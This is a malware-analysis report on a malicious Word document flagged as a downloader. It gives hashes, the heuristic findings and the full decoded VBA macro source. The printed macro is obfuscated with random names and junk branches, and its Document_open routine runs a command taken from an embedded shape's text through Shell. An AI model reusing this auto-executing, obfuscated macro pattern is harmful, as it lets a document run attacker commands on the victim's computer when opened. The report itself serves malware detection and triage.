Office (OLE) malware analysis — malicious · 7262fb51c55d35b3

MALICIOUS

Office (OLE)

70.9 KB Created: 2018-11-12 14:19:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: ba2b06b432c772e72af47a65a56c6ba4 SHA-1: e7acb9f48deb81cec8c37ebe4c696133a87704c6 SHA-256: 7262fb51c55d35b37d85c8b277f0ff4d5106997f353b80437481be493a3d29d7

272 Risk Score

Heuristics 9

ClamAV: Doc.Downloader.Generic-6747969-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6747969-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

    End If
ELAkpZCQob = Shell(mBSvvFjS + iOQZcj + jKEDvU, LdqDBUl)
   If (acqcH <> 0 Or JvhWiVnJ) Then

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

End Function
Private Sub Document_open()
   If (EljAoR <> 0 Or dCJjFwlI) Then

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4237 bytes
SHA-256: `3b823b818e923c636278e383d8e89ea21165a3deb2a0a379ef730de05f1c125d`
Detection ClamAV: No threats found Obfuscation or payload: likely 44 of 81 identifiers look randomly generated (e.g. 'YEjjRbZnd') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zEpOGGHG" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function AVWQcovL() Const LdqDBUl = 440641401 - 440641401 If (wOAXr <> 0 Or bEBYiAb) Then bEBYiAb = True UCcMiis = UCcMiis & CInt(wOAXr) If (wOAXr = 1) Then UCcMiis = UCcMiis & "mDDpoRCzp" Else UCcMiis = UCcMiis & "UubzREuJ" End If End If If (aHCQRjK <> 0 Or RfbfRwbz) Then RfbfRwbz = True BiKBCi = BiKBCi & Atn(aHCQRjK) If (aHCQRjK = 1) Then BiKBCi = BiKBCi & "fhzWlYRVD" Else BiKBCi = BiKBCi & "YfAnYE" End If End If If (wjUEwKh <> 0 Or cSlTiwv) Then cSlTiwv = True thsiDYLRc = thsiDYLRc & CInt(wjUEwKh) If (wjUEwKh = 1) Then thsiDYLRc = thsiDYLRc & "fCicfhQs" Else thsiDYLRc = thsiDYLRc & "irtrG" End If End If mBSvvFjS = Shapes(1).TextFrame.TextRange.Text If (kAGqCoST <> 0 Or owDOYG) Then owDOYG = True XEOzNpE = XEOzNpE & CInt(kAGqCoST) If (kAGqCoST = 1) Then XEOzNpE = XEOzNpE & "avfTnlFoL" Else XEOzNpE = XEOzNpE & "TXqFdpKk" End If End If If (cfbfLau <> 0 Or KzYuvGQH) Then KzYuvGQH = True zfZjH = zfZjH & CInt(cfbfLau) If (cfbfLau = 1) Then zfZjH = zfZjH & "YEjjRbZnd" Else zfZjH = zfZjH & "ZXvUzH" End If End If If (KJpciWTk <> 0 Or aRdYYJkjl) Then aRdYYJkjl = True DtNGbEXw = DtNGbEXw & CDbl(KJpciWTk) If (KJpciWTk = 1) Then DtNGbEXw = DtNGbEXw & "jddDnUYjp" Else DtNGbEXw = DtNGbEXw & "SARnZ" End If End If ELAkpZCQob = Shell(mBSvvFjS + iOQZcj + jKEDvU, LdqDBUl) If (acqcH <> 0 Or JvhWiVnJ) Then JvhWiVnJ = True ShMdcIfHz = ShMdcIfHz & CByte(acqcH) If (acqcH = 1) Then ShMdcIfHz = ShMdcIfHz & "FscYJdC" Else ShMdcIfHz = ShMdcIfHz & "RYiWO" End If End If If (EVsFBUiWS <> 0 Or VjrLuvVq) Then VjrLuvVq = True CshWXsjOV = CshWXsjOV & CDbl(EVsFBUiWS) If (EVsFBUiWS = 1) Then CshWXsjOV = CshWXsjOV & "NvSzkXnm" Else CshWXsjOV = CshWXsjOV & "wIWVK" End If End If If (uLvXcJfO <> 0 Or AXwVNU) Then AXwVNU = True NlEqC = NlEqC & CDbl(uLvXcJfO) If (uLvXcJfO = 1) Then NlEqC = NlEqC & "HnHJTsrf" Else NlEqC = NlEqC & "XkjwUSz" End If End If End Function Private Sub Document_open() If (EljAoR <> 0 Or dCJjFwlI) Then dCJjFwlI = True IQTpn = IQTpn & CInt(EljAoR) If (EljAoR = 1) Then IQTpn = IQTpn & "jizNlOA" Else IQTpn = IQTpn & "PdAZwAXn" End If End If If (fOpWmSowp <> 0 Or JhoOdj) Then JhoOdj = True FAbfZ = FAbfZ & Atn(fOpWmSowp) If (fOpWmSowp = 1) Then FAbfZ = FAbfZ & "OuGEWmH" Else FAbfZ = FAbfZ & "VwbKYhKr" End If End If If (nYjiiom <> 0 Or RwRmrMGkb) Then RwRmrMGkb = True jNSMhjo = jNSMhjo & CByte(nYjiiom) If (nYjiiom = 1) Then jNSMhjo = jNSMhjo & "NEEwtOSC" Else jNSMhjo = jNSMhjo & "AukMRSZUL" End If End If AVWQcovL If (PDnGi <> 0 Or UHbrzp) Then UHbrzp = True bhrTCDTpT = bhrTCDTpT & CInt(PDnGi) If (PDnGi = 1) Then bhrTCDTpT = bhrTCDTpT & "qrPOu" Else bhrTCDTpT = bhrTCDTpT & "rWUFbwAQs" End If End If If (wuRJu <> 0 Or NqlhBJLPS) Then NqlhBJLPS = True wwPSzaOjU = wwPSzaOjU & CInt(wuRJu) If (wuRJu = 1) Then wwPSzaOjU = wwPSzaOjU & "kWchaarB" Else wwPSzaOjU = wwPSzaOjU & "uCwwwCX" End If End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.